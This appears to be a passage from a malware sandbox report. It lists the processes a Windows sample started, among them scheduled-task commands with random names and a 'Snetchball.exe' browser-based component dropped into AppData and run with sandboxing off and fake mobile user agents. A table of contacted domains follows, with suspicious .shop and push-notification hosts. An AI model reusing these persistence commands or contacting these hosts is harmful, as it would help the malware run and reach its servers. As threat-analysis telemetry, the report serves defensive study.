schtasks /run /I /tn "OyrSf1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1928
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe22cf46f8,0x7ffe22cf4708,0x7ffe22cf4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1892
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2988 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5180 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OyrSf1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6260 /prefetch:1
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5416 -ip 5416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5416 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5632 -ip 5632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 2288
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1788
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2868 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3024 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3068 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3172 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3184 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1424
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,12235926737604672969,186094299440139020,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3920 /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/26.0 Chrome/122.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=6052 --field-trial-handle=2872,i,15388689735004980344,1046342718699052538,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3100 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3116 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.110 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3140 --field-trial-handle=2880,i,8313210202729395025,15962647928681082990,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2864 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3164 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3168 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3208 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:128.0) Gecko/128.0 Firefox/128.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3212 --field-trial-handle=2868,i,4550213007828169570,17431732936423297949,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | nxt-psh.com | udp |
| US | 8.8.8.8:53 | 6.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.194.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 104.21.67.200:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 92.123.143.201:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | 200.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.143.123.92.in-addr.arpa | udp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | senzamenuzaes.shop | udp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 8.8.8.8:53 | 174.70.21.104.in-addr.arpa | udp |
